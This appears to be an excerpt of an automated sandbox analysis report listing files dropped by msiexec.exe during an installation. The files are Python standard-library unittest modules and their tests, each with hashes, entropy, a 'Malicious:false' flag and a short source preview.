                                                                                                                                Preview:"""Test case implementation"""....import sys..import functools..import difflib..import pprint..import re..import warnings..import collections..import contextlib..import traceback..import types....from . import result..from .util import (strclass, safe_repr, _count_diff_all_purpose,.. _count_diff_hashable, _common_shorten_repr)....__unittest = True...._subtest_msg_sentinel = object()....DIFF_OMITTED = ('\nDiff is %s characters long. '.. 'Set self.maxDiff to None to see it.')....class SkipTest(Exception):.. """.. Raise this exception in a test to skip it..... Usually you can use TestCase.skipTest() or one of the skipping decorators.. instead of raising this directly... """....class _ShouldStop(Exception):.. """.. The test should stop... """....class _UnexpectedSuccess(Exception):.. """.. The test was supposed to fail, but it didn't!.. """......class _Outcome(object):.. def __init__(self, result=None):.. self.exp
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):22618
                                                                                                                                Entropy (8bit):4.334382173405823
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:aRbrfiuwkw9BeW0Y1jyl5jzLSeQ9kXxxxJADFhiVm42iVSMEfMb:aRHKuwkwjeW0Y1jyl5jzLSeQWxxxKDF2
                                                                                                                                MD5:92788B3AD3E94E5F1FF69EDC8932E849
                                                                                                                                SHA1:BA32EA6A18433DDD7B442D36D8E2659476BD730D
                                                                                                                                SHA-256:D5E231CEA60B82A18A0CDA4C90327511A2DC6FED2BF36D3E3870F5BABD9C9F8F
                                                                                                                                SHA-512:9FAA20A9095C10340BD1B0AABD9E4E695B2D9E845F2A2E23C22900148227AF8847C5C1861A3E707CC437A9C50E14A4D79C453DF6CFF9572600C78549739253C5
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Loading unittests."""....import os..import re..import sys..import traceback..import types..import functools..import warnings....from fnmatch import fnmatch, fnmatchcase....from . import case, suite, util....__unittest = True....# what about .pyc (etc)..# we would need to avoid loading the same tests multiple times..# from '.py', *and* '.pyc'..VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)......class _FailedTest(case.TestCase):.. _testMethodName = None.... def __init__(self, method_name, exception):.. self._exception = exception.. super(_FailedTest, self).__init__(method_name).... def __getattr__(self, name):.. if name != self._testMethodName:.. return super(_FailedTest, self).__getattr__(name).. def testFailure():.. raise self._exception.. return testFailure......def _make_failed_import_test(name, suiteClass):.. message = 'Failed to import test module: %s\n%s' % (.. name, traceback.format_e
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11693
                                                                                                                                Entropy (8bit):4.258539150787032
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:nvblgdIxKrpDDfqFZrJiGGCb9LhcUq5PDaWC:noaJaedcUqFw
                                                                                                                                MD5:3085B2DA1B13B4E5995533091375C9BC
                                                                                                                                SHA1:1CB62E15A759EA6AA10B1287F68684707D3D76E4
                                                                                                                                SHA-256:5F67FCA16DADCC820D93CAE5C5488FDB43507484B8B51B0D9D55526E4D9E237E
                                                                                                                                SHA-512:A1FD9F30CEFFC2C6EAF6105E73B0BD1FAD909CFD122AE3695386C1783B581A8AFD377AB28BA7CA983608EFFF53D6E3A147BF83E08AEA2137A0B704290C208AF3
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Unittest main program"""....import sys..import argparse..import os..import warnings....from . import loader, runner..from .signals import installHandler....__unittest = True....MAIN_EXAMPLES = """\..Examples:.. %(prog)s test_module - run tests from test_module.. %(prog)s module.TestClass - run tests from module.TestClass.. %(prog)s module.Class.test_method - run specified test method.. %(prog)s path/to/test_file.py - run tests from test_file.py.."""....MODULE_EXAMPLES = """\..Examples:.. %(prog)s - run default set of tests.. %(prog)s MyTestSuite - run suite 'MyTestSuite'.. %(prog)s MyTestCase.testSomething - run MyTestCase.testSomething.. %(prog)s MyTestCase - run all 'test*' test methods.. in MyTestCase.."""....def _convert_name(name):.. # on Linux / Mac OS X 'foo.PY' is not importable, but on.. # Windows it is. Simpler to do a case insensitive ma
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):105270
                                                                                                                                Entropy (8bit):4.453766430890803
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:56dg8wZFkrqvkWgtN3tu64MkmbymTMjM58p9a3vkO3Adg:06f8
                                                                                                                                MD5:7BE8997D9920410F4CC12639A0F6869B
                                                                                                                                SHA1:B8DD79ED934F55CE4A6D73EF7233A27E0B1CE130
                                                                                                                                SHA-256:6CC5F7EF7BB3F8686AFB1D8A435DEEEB328E42106811EC479EC18DFDFDBD2DD9
                                                                                                                                SHA-512:35AF9EDB120BA905F5A0F74A93FA4DD60F2584C78DF69821F04779DD07F2DE8E23CFA4816477EE72598C43D1EBC3E2F94B16E845610639CCA7475469279D8BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:# mock.py..# Test tools for mocking and patching...# Maintained by Michael Foord..# Backport for other versions of Python available from..# https://pypi.org/project/mock....__all__ = (.. 'Mock',.. 'MagicMock',.. 'patch',.. 'sentinel',.. 'DEFAULT',.. 'ANY',.. 'call',.. 'create_autospec',.. 'AsyncMock',.. 'FILTER_DIR',.. 'NonCallableMock',.. 'NonCallableMagicMock',.. 'mock_open',.. 'PropertyMock',.. 'seal',..)......import asyncio..import contextlib..import io..import inspect..import pprint..import sys..import builtins..import pkgutil..from asyncio import iscoroutinefunction..from types import CodeType, ModuleType, MethodType..from unittest.util import safe_repr..from functools import wraps, partial......class InvalidSpecError(Exception):.. """Indicates that an invalid value was used as a mock spec."""......_builtins = {name for name in dir(builtins) if not name.startswith('_')}....FILTER_DIR = True....# Workaround for issue #12370..# Withou
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8632
                                                                                                                                Entropy (8bit):4.346907285869164
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:y6G4aluqyHxx42yZCP5E3X6pTm3NpLttJMRXM9ViJcdZEi/ktJmHrsNq:yPQqK9yKW3X6YHJtJMRwViJcgi/krQsq
                                                                                                                                MD5:92F252403C25EDDF2CF4D733EBECD663
                                                                                                                                SHA1:9A16830AC47393D4DB0626A9C814E681686E73EC
                                                                                                                                SHA-256:25A97B58BD765657EE9EA4A51476B677CB1F6D5CFB5EE333CC21F605A1A88ACE
                                                                                                                                SHA-512:75C6847AF7199C0CC52037091AC706416E06C0481CD144643367B09443B3A95CF3EDC36F1E097CF58DED2B377331C1A1640E49AF5FF1C4F785B82F1BDC8C3F3E
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Test result object"""....import io..import sys..import traceback....from . import util..from functools import wraps....__unittest = True....def failfast(method):.. @wraps(method).. def inner(self, *args, **kw):.. if getattr(self, 'failfast', False):.. self.stop().. return method(self, *args, **kw).. return inner....STDOUT_LINE = '\nStdout:\n%s'..STDERR_LINE = '\nStderr:\n%s'......class TestResult(object):.. """Holder for test result information..... Test results are automatically managed by the TestCase and TestSuite.. classes, and do not need to be explicitly manipulated by writers of tests..... Each instance holds the total number of tests run, and collections of.. failures and errors that occurred among those test runs. The collections.. contain tuples of (testcase, exceptioninfo), where exceptioninfo is the.. formatted traceback of the error that occurred... """.. _previousTestClass = None.. _testRunEntered = False.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9681
                                                                                                                                Entropy (8bit):4.287445411705657
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:M/uLrvVuSt3zsPJsYkSYRuVR0gs6LQanXfmPEjKCqR+2vYE8X603L:MGb0a3IPuYkIna6QYiTvY3L
                                                                                                                                MD5:F6FD71A384AAE4F4E85D0CFDDD42393D
                                                                                                                                SHA1:97747433336F791DF948FE361F9FEE394F9EF469
                                                                                                                                SHA-256:074BE40B4703AE2C8CF3391053B766EBDDC77404DD66968151DF15B2C1040C70
                                                                                                                                SHA-512:02C032D0FB39320735AE0B2D74322D180C057D583D49363DD86124D9DDF53BE0E4267E7610F832B4A9D0D1077F3319DCC4C5AF0685FF145057D9F01D482A774C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Running tests"""....import sys..import time..import warnings....from . import result..from .case import _SubTest..from .signals import registerResult....__unittest = True......class _WritelnDecorator(object):.. """Used to decorate file-like objects with a handy 'writeln' method""".. def __init__(self,stream):.. self.stream = stream.... def __getattr__(self, attr):.. if attr in ('stream', '__getstate__'):.. raise AttributeError(attr).. return getattr(self.stream,attr).... def writeln(self, arg=None):.. if arg:.. self.write(arg).. self.write('\n') # text-mode streams translate to \r\n if needed......class TextTestResult(result.TestResult):.. """A test result class that can print formatted text results to a stream..... Used by TextTestRunner... """.. separator1 = '=' * 70.. separator2 = '-' * 70.... def __init__(self, stream, descriptions, verbosity):.. super(TextTestResult, self).__init__(str
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2474
                                                                                                                                Entropy (8bit):4.375420704477591
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:0SUtuV4gLKORr3JJxvMNNcW0c/S2fjuIRrMiH5ZSchSvu0:L/6gLKyrXxUPcW0c/NqIRrLZSHvu0
                                                                                                                                MD5:F17FE1C654048799F6A7EFC93013F143
                                                                                                                                SHA1:D274875487C096F562557BB9B4259BB533CE20D0
                                                                                                                                SHA-256:0ED7CF1CBE0CAB769746B3B344F65A659D912C56CD63D1A4280F9B09A77B778F
                                                                                                                                SHA-512:158D783F2621D65F3225C12847422938F948A0DC0D5578414027D9A6D2A0912892A2622BEB806A06FFE2A0442DFF8F1033B44C4E67DCD439A36DE8EB22F763C1
                                                                                                                                Malicious:false
                                                                                                                                Preview:import signal..import weakref....from functools import wraps....__unittest = True......class _InterruptHandler(object):.. def __init__(self, default_handler):.. self.called = False.. self.original_handler = default_handler.. if isinstance(default_handler, int):.. if default_handler == signal.SIG_DFL:.. # Pretend it's signal.default_int_handler instead... default_handler = signal.default_int_handler.. elif default_handler == signal.SIG_IGN:.. # Not quite the same thing as SIG_IGN, but the closest we.. # can make it: do nothing... def default_handler(unused_signum, unused_frame):.. pass.. else:.. raise TypeError("expected SIGINT signal handler to be ".. "signal.SIG_IGN, signal.SIG_DFL, or a ".. "callable object").. self.default_handler = default_handler....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13891
                                                                                                                                Entropy (8bit):4.091955505544467
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:GoslZdlUmbT6unPTxdzkKTPoZFM3BCUlSk:GoiXBbqbk
                                                                                                                                MD5:1BFC31F66AEB5E141C221467F520C8AE
                                                                                                                                SHA1:99BB5CFB5BCC6A79C44420A72AC76C3B2C613FFA
                                                                                                                                SHA-256:26ACD439BC5828FCBA41C1DC7D2495CE05ED4F9073375E7FBFAC05FAFDD82E64
                                                                                                                                SHA-512:3A2E7B3BB483B386BE0CC27BDFFDC811F2F724D50B1E3595A5A84184D07A534D3F3365CEED83B019875E6189D21A4D2D72AB1408AB33922E7B9935ABBECB923B
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""TestSuite"""....import sys....from . import case..from . import util....__unittest = True......def _call_if_exists(parent, attr):.. func = getattr(parent, attr, lambda: None).. func()......class BaseTestSuite(object):.. """A simple test suite that doesn't provide class or module shared fixtures... """.. _cleanup = True.... def __init__(self, tests=()):.. self._tests = [].. self._removed_tests = 0.. self.addTests(tests).... def __repr__(self):.. return "<%s tests=%s>" % (util.strclass(self.__class__), list(self)).... def __eq__(self, other):.. if not isinstance(other, self.__class__):.. return NotImplemented.. return list(self) == list(other).... def __iter__(self):.. return iter(self._tests).... def countTestCases(self):.. cases = self._removed_tests.. for test in self:.. if test:.. cases += test.countTestCases().. return cases.... def addTest(s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):693
                                                                                                                                Entropy (8bit):4.403719952872766
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:AIZFaeFSRsAsKVDmAArUsi+og1HXoAp/LSgQ+Gd/9Ca02pWKCn:AGagSRCKVDww3S2ApzSp/Aop+n
                                                                                                                                MD5:38485D1256261B24282C3127A9167440
                                                                                                                                SHA1:CCE21F51CE3A9B9C65DB99F396F4181A60BEECFF
                                                                                                                                SHA-256:90763A2D1348562C5CF40E913CEDFC7A02B104479E2AD98478A016B877D9578A
                                                                                                                                SHA-512:FF8A39C06FAD6B6B4C81F55F0E8930D174E613A51D5CDF17D5B504B6313AB854B8B86A287569B64C908D9295FADDB901CCA25AB1506B88A0D17C9D32604CCA50
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import sys..import unittest......here = os.path.dirname(__file__)..loader = unittest.defaultTestLoader....def suite():.. suite = unittest.TestSuite().. for fn in os.listdir(here):.. if fn.startswith("test") and fn.endswith(".py"):.. modname = "unittest.test." + fn[:-3].. try:.. __import__(modname).. except unittest.SkipTest:.. continue.. module = sys.modules[modname].. suite.addTest(loader.loadTestsFromModule(module)).. suite.addTest(loader.loadTestsFromName('unittest.test.testmock')).. return suite......if __name__ == "__main__":.. unittest.main(defaultTest="suite")..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):614
                                                                                                                                Entropy (8bit):4.359891331294831
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:03u6zGvoMgPZiGQjzciFIHgsycYhMaF91Pa02aLB:03DGvXQi1ER6MMTipa1
                                                                                                                                MD5:75F16A2E31EC94AF6BDA81311688FE6D
                                                                                                                                SHA1:6DDA3ADD306D70AFBFF3CCC3E4CC7602F53E780E
                                                                                                                                SHA-256:8073984DFB3DC77A51FE96CC094066F47AA25C57E62057F043FEB891E2806260
                                                                                                                                SHA-512:702E2EAC8FB58EAB805E598135B5899E1AA96489C2D7B6BF588E4127F71C5660F473F2218F832432AF690770A032DD6253C8E279322AE3EE2AB3667C077C9B66
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import unittest......def load_tests(loader, standard_tests, pattern):.. # top level directory cached on loader instance.. this_dir = os.path.dirname(__file__).. pattern = pattern or "test_*.py".. # We are inside unittest.test, so the top-level is two notches up.. top_level_dir = os.path.dirname(os.path.dirname(this_dir)).. package_tests = loader.discover(start_dir=this_dir, pattern=pattern,.. top_level_dir=top_level_dir).. standard_tests.addTests(package_tests).. return standard_tests......if __name__ == '__main__':.. unittest.main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2377
                                                                                                                                Entropy (8bit):4.584824816260691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:KPCxniolKHrErHXMr6R+g5wOFF3f0HldlvfqSaVZLe:K8iolKHrM8egO9FvslvfqSGZLe
                                                                                                                                MD5:3F2ADD149300A96433F2841A77F3EC75
                                                                                                                                SHA1:21DAAD09C59216F99D5AE4929D97899A9344269D
                                                                                                                                SHA-256:7E83EE661B1402BFBF81D7380FBE4510B5A408EAAA78118B123A52DF718248D1
                                                                                                                                SHA-512:340B323C5693088BE94FA2D02978D61214AEE1AC6EABD41242ED6D052457A78B5B2B7CFA41FED7F7BD2342F8954DDC38DDBABB4D0EDD80DF01A37C911107F106
                                                                                                                                Malicious:false
                                                                                                                                Preview:# helper module for test_runner.Test_TextTestRunner.test_warnings...."""..This module has a number of tests that raise different kinds of warnings...When the tests are run, the warnings are caught and their messages are printed..to stdout. This module also accepts an arg that is then passed to..unittest.main to affect the behavior of warnings...Test_TextTestRunner.test_warnings executes this script with different..combinations of warnings args and -W flags and check that the output is correct...See #10535..."""....import sys..import unittest..import warnings....def warnfun():.. warnings.warn('rw', RuntimeWarning)....class TestWarnings(unittest.TestCase):.. # unittest warnings will be printed at most once per type (max one message.. # for the fail* methods, and one for the assert* methods).. def test_assert(self):.. self.assertEquals(2+2, 4).. self.assertEquals(2*2, 4).. self.assertEquals(2**2, 4).... def test_fail(self):.. self.failUnless(1).
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51
                                                                                                                                Entropy (8bit):4.145478224698413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SN7cF3+dXFbrABgBN:SNgsXFbUBW
                                                                                                                                MD5:4375144C51DAE845EB5388805C79BFBC
                                                                                                                                SHA1:CEFB243C3A0FBE21EC26563B5973534090F38987
                                                                                                                                SHA-256:6B84DED05848AD02D9ECDCB904BF66A5830F6E599520AC9AFF0AF7F99D410365
                                                                                                                                SHA-512:D3B5B804C6FB31339BC5EC73EB259739E65E11B6DC63A24978B9BAD60E0FE4CDC1297AD7CE649693D5EE62162BF46D3C00BAD70CED512C6D3A6203FEB48B3944
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Empty module for testing the loading of modules..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3890
                                                                                                                                Entropy (8bit):4.579237470392388
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:asgQMoyXQMAMXxogKFSO3u7hApvwdwPDKMCzRNrIGbNpPnEGN7zOYRLzS6AEaD21:aBaSj1wvwdwWMMRvp/l7zDLn8D21
                                                                                                                                MD5:F5D62D5D36F42AB3589F76BCEE070A5C
                                                                                                                                SHA1:6760509A6D28CBB3EAC2D331B68F8A9B2B1F1D8A
                                                                                                                                SHA-256:2EA4261227EEC3698A06D9A9E8B4BB11367D7B92F90B2FF5B44DB8E27EAC6AEC
                                                                                                                                SHA-512:A2E5F711DA646145B171490C8BD564D927E2DE35DCBE56C60C808910950E60A74791FF04EBA6C9EF059230519F359757D0B0CD923BD67F27B1289239AE1E6BE6
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest......class TestEquality(object):.. """Used as a mixin for TestCase""".... # Check for a valid __eq__ implementation.. def test_eq(self):.. for obj_1, obj_2 in self.eq_pairs:.. self.assertEqual(obj_1, obj_2).. self.assertEqual(obj_2, obj_1).... # Check for a valid __ne__ implementation.. def test_ne(self):.. for obj_1, obj_2 in self.ne_pairs:.. self.assertNotEqual(obj_1, obj_2).. self.assertNotEqual(obj_2, obj_1)....class TestHashing(object):.. """Used as a mixin for TestCase""".... # Check for a valid __hash__ implementation.. def test_hash(self):.. for obj_1, obj_2 in self.eq_pairs:.. try:.. if not hash(obj_1) == hash(obj_2):.. self.fail("%r and %r do not hash equal" % (obj_1, obj_2)).. except Exception as e:.. self.fail("Problem hashing %r and %r: %s" % (obj_1, obj_2, e)).... for obj_1, obj_2 in self.ne_
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17624
                                                                                                                                Entropy (8bit):4.276705459518351
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:8sfiG/Ateqd0eaZbP+9mp1/gGLqqOi+w85i:8sfiG/Ateqd0eAP9g7s1f
                                                                                                                                MD5:CE3C45948F3E9312196D80D3CF426D6A
                                                                                                                                SHA1:7E0F0A4E31EA3D4864D5BBBA0C3C4C85CEFAAE9E
                                                                                                                                SHA-256:90258CAED89164F7E4E1341D8B9FCB67829692A7A99AAAA706F91A6795218B09
                                                                                                                                SHA-512:5430EDA64A117CF60BA982975454388BE236F9D182608426DDCED22BAA1D9E5D771CE4CB0934E3B74EE95DC4E51581ED8A91E71CB21F5DC60A5468802A8A4B01
                                                                                                                                Malicious:false
                                                                                                                                Preview:import datetime..import warnings..import weakref..import unittest..from test.support import gc_collect..from itertools import product......class Test_Assertions(unittest.TestCase):.. def test_AlmostEqual(self):.. self.assertAlmostEqual(1.00000001, 1.0).. self.assertNotAlmostEqual(1.0000001, 1.0).. self.assertRaises(self.failureException,.. self.assertAlmostEqual, 1.0000001, 1.0).. self.assertRaises(self.failureException,.. self.assertNotAlmostEqual, 1.00000001, 1.0).... self.assertAlmostEqual(1.1, 1.0, places=0).. self.assertRaises(self.failureException,.. self.assertAlmostEqual, 1.1, 1.0, places=1).... self.assertAlmostEqual(0, .1+.1j, places=0).. self.assertNotAlmostEqual(0, .1+.1j, places=1).. self.assertRaises(self.failureException,.. self.assertAlmostEqual, 0, .1+.1j, places=1).. self.assertRaises(self.failureE
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16358
                                                                                                                                Entropy (8bit):4.269330651587969
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:kk85mNKEQDU4zsUOff/U888UAKQ2OuN/QrPxCUOkyA:JNKEQDXzs5ff/x881KnqPI5q
                                                                                                                                MD5:4CBAD6107D45A14702A9D90913628C85
                                                                                                                                SHA1:6148EEF7969E29A5337A0970DB5978A06D0F6EC4
                                                                                                                                SHA-256:6832A4537CBBDD12623D8BAB02E19FEDA0F493DDFD56A5A87B7DF328FB5892ED
                                                                                                                                SHA-512:24B441DE807FF60E82AB573A4EAA9B8DF814BA08AF1B2F271466B77899C140279589AB98BA621218D75EBE68E88FEA271AA0531606EA23D72B142D1A9893EE17
                                                                                                                                Malicious:false
                                                                                                                                Preview:import asyncio..import contextvars..import unittest..from test import support....support.requires_working_socket(module=True)......class MyException(Exception):.. pass......def tearDownModule():.. asyncio.set_event_loop_policy(None)......class TestCM:.. def __init__(self, ordering, enter_result=None):.. self.ordering = ordering.. self.enter_result = enter_result.... async def __aenter__(self):.. self.ordering.append('enter').. return self.enter_result.... async def __aexit__(self, *exc_info):.. self.ordering.append('exit')......class LacksEnterAndExit:.. pass..class LacksEnter:.. async def __aexit__(self, *exc_info):.. pass..class LacksExit:.. async def __aenter__(self):.. pass......VAR = contextvars.ContextVar('VAR', default=())......class TestAsyncCase(unittest.TestCase):.. maxDiff = None.... def setUp(self):.. # Ensure that IsolatedAsyncioTestCase instances are destroyed before.. # starting
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11117
                                                                                                                                Entropy (8bit):4.386500752597828
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:K8K3hb/iRb6J/NRCq/RRO7nRtaSj1QafdvRDtR2PFhKYmKJKHA:Kth+bcC4O7RDnDr8F3F
                                                                                                                                MD5:B8543506AA016C9A536D2EE2969BEA2F
                                                                                                                                SHA1:EDFF29B773682EF8782B21E6DF93C6246E4CC49E
                                                                                                                                SHA-256:302DA7B54D53979526ABBF3BB97CCB848EC3B96FDD6285B27EB5C0F614C662CF
                                                                                                                                SHA-512:D148C09CD062D779CB9B677AE792623A9726D0645CBB8006F3B6CA207AB25349BC8ED825930A734E154466F302E1956E7888C9D59BF913176BB95D83FA985604
                                                                                                                                Malicious:false
                                                                                                                                Preview:import gc..import io..import os..import sys..import signal..import weakref..import unittest....from test import support......@unittest.skipUnless(hasattr(os, 'kill'), "Test requires os.kill")..@unittest.skipIf(sys.platform =="win32", "Test cannot run on Windows")..class TestBreak(unittest.TestCase):.. int_handler = None.. # This number was smart-guessed, previously tests were failing.. # after 7th run. So, we take `x * 2 + 1` to be sure... default_repeats = 15.... def setUp(self):.. self._default_handler = signal.getsignal(signal.SIGINT).. if self.int_handler is not None:.. signal.signal(signal.SIGINT, self.int_handler).... def tearDown(self):.. signal.signal(signal.SIGINT, self._default_handler).. unittest.signals._results = weakref.WeakKeyDictionary().. unittest.signals._interrupt_handler = None...... def withRepeats(self, test_function, repeats=None):.. if not support.check_impl_detail(cpython=True):..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):79779
                                                                                                                                Entropy (8bit):4.5399260012016995
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:CVr0lMOHMOwMOMVJYlSHDB088onTJRNV+J/v+8bw258s:ClFTiFmlSjBz5nWJ/WL2r
                                                                                                                                MD5:CAC4C76F801BDF7741C02DBA606C01CC
                                                                                                                                SHA1:E78C088FBFC24A142E66740AE3299F6876B6103D
                                                                                                                                SHA-256:AA3AE295025C24C85A7EA17B53C65D06FE98C0327A4CB360A67653E9F3508C11
                                                                                                                                SHA-512:CC5BC9F55BB4298528C716856E9E2EFFFC5BB2862600716E120A05B19BEE80B8E045B1B5418AAE6709C7080BD6F205432634434A4E871E9A2DEBCFDAF06DF43D
                                                                                                                                Malicious:false
                                                                                                                                Preview:import contextlib..import difflib..import pprint..import pickle..import re..import sys..import logging..import warnings..import weakref..import inspect..import types....from copy import deepcopy..from test import support....import unittest....from unittest.test.support import (.. TestEquality, TestHashing, LoggingResult, LegacyLoggingResult,.. ResultWithNoStartTestRunStopTestRun..)..from test.support import captured_stderr, gc_collect......log_foo = logging.getLogger('foo')..log_foobar = logging.getLogger('foo.bar')..log_quux = logging.getLogger('quux')......class Test(object):.. "Keep these TestCase classes out of the main namespace".... class Foo(unittest.TestCase):.. def runTest(self): pass.. def test1(self): pass.... class Bar(Foo):.. def test2(self): pass.... class LoggingTestCase(unittest.TestCase):.. """A test case which logs its calls.""".... def __init__(self, events):.. super(Test.LoggingTestCase, self).__init__(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33706
                                                                                                                                Entropy (8bit):4.44790010243603
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:wND53NpJ3A328nI32vusB3Yury/uMyXtuaFTAFf4WDFcBw:wNDbKxtyj0In
                                                                                                                                MD5:B5B3C9CDAD73CBF82D5729A5C1AC7208
                                                                                                                                SHA1:E481A279F8F8F4BEFFA153BD9D1808E7EFF4FFFC
                                                                                                                                SHA-256:54DAE78A94F10EA2AE16C981D0D05448432D6CB87F00C3A682276B5A3C5A18C6
                                                                                                                                SHA-512:6296E01ED1CD1B8C1AF1D8AB1ECBA8857E78032844095354AD698710C9776C4B7786437BB6399630C90F8ABBA91D6D3BB916C3E3FE80F66DA87DF29214A20EAE
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os.path..from os.path import abspath..import re..import sys..import types..import pickle..from test import support..from test.support import import_helper..import test.test_importlib.util....import unittest..import unittest.mock..import unittest.test......class TestableTestProgram(unittest.TestProgram):.. module = None.. exit = True.. defaultTest = failfast = catchbreak = buffer = None.. verbosity = 1.. progName = ''.. testRunner = testLoader = None.... def __init__(self):.. pass......class TestDiscovery(unittest.TestCase):.... # Heavily mocked tests so I can avoid hitting the filesystem.. def test_get_name_from_path(self):.. loader = unittest.TestLoader().. loader._top_level_dir = '/foo'.. name = loader._get_name_from_path('/foo/bar/baz.py').. self.assertEqual(name, 'bar.baz').... if not __debug__:.. # asserts are off.. return.... with self.assertRaises(AssertionError):..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5688
                                                                                                                                Entropy (8bit):4.440238845714062
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:iVPlz2JpHYdpEdpetdpiQeo4F2zRIPcMzNoIPchBA:n4HEHetHiQejgIEI8A
                                                                                                                                MD5:862CFC860B7E04E620769BDC67964E20
                                                                                                                                SHA1:003A1968B86C203B31E48C14F02D4F97115C62ED
                                                                                                                                SHA-256:44E04CE930809EF390FE23372A96B4251A9CC5ECEE5E4548DCECAA2E7FAEA922
                                                                                                                                SHA-512:29AB98487EF9B498DEE4C94404367E72BD0634828193A526265E6340F706E47827DE4CCCA2C2ECDA87EB2C28632DE0BB00E44B89D3CB369179D31FA87EA8096C
                                                                                                                                Malicious:false
                                                                                                                                Preview:import unittest....from unittest.test.support import LoggingResult......class Test_FunctionTestCase(unittest.TestCase):.... # "Return the number of tests represented by the this test object. For.. # TestCase instances, this will always be 1".. def test_countTestCases(self):.. test = unittest.FunctionTestCase(lambda: None).... self.assertEqual(test.countTestCases(), 1).... # "When a setUp() method is defined, the test runner will run that method.. # prior to each test. Likewise, if a tearDown() method is defined, the.. # test runner will invoke that method after each test. In the example,.. # setUp() was used to create a fresh sequence for each test.".. #.. # Make sure the proper call order is maintained, even if setUp() raises.. # an exception... def test_run_call_order__error_in_setUp(self):.. events = [].. result = LoggingResult(events).... def setUp():.. events.append('setUp').. raise RuntimeEr
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):66563
                                                                                                                                Entropy (8bit):4.536741256699273
                                                                                                                                Encrypted:false
